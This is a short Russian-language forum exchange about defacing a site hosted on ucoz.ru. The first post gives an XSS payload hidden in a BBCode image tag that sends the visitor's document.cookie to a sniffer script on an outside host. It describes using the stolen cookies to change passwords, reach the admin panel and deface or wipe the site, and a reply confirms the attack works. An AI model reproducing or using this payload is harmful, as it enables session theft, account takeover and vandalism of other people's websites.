Просто была необходимость задефейсить один сайтик на укоз.ру [img ]javascript:document.images%5b0%5d.src=%22http://snif/sniffer.php?%22+document.cookie[/img] Вот уязвимость хсс для интернет эксплорер. С помощью полученных кук можно сменить пароль жертвы (и вообще все настройки аккаунта), пройти в любой раздел,(админка,добавка/редактирование новостей и все остальное - зависит от того чьи куки стыбрил), ну а с этим легко можно сделать дефейс или снести просто весь сайт.
Спасибо огромное. Всё работает! Кстати, никто не знает...каким образом шифруется там пароль... p.s. Только в админку попасть вроде как нельзя. т.к. приходят куки от форума(сайта), но не от аккакунта. А это два разных пасса. Либо я чего - то не понимаю?
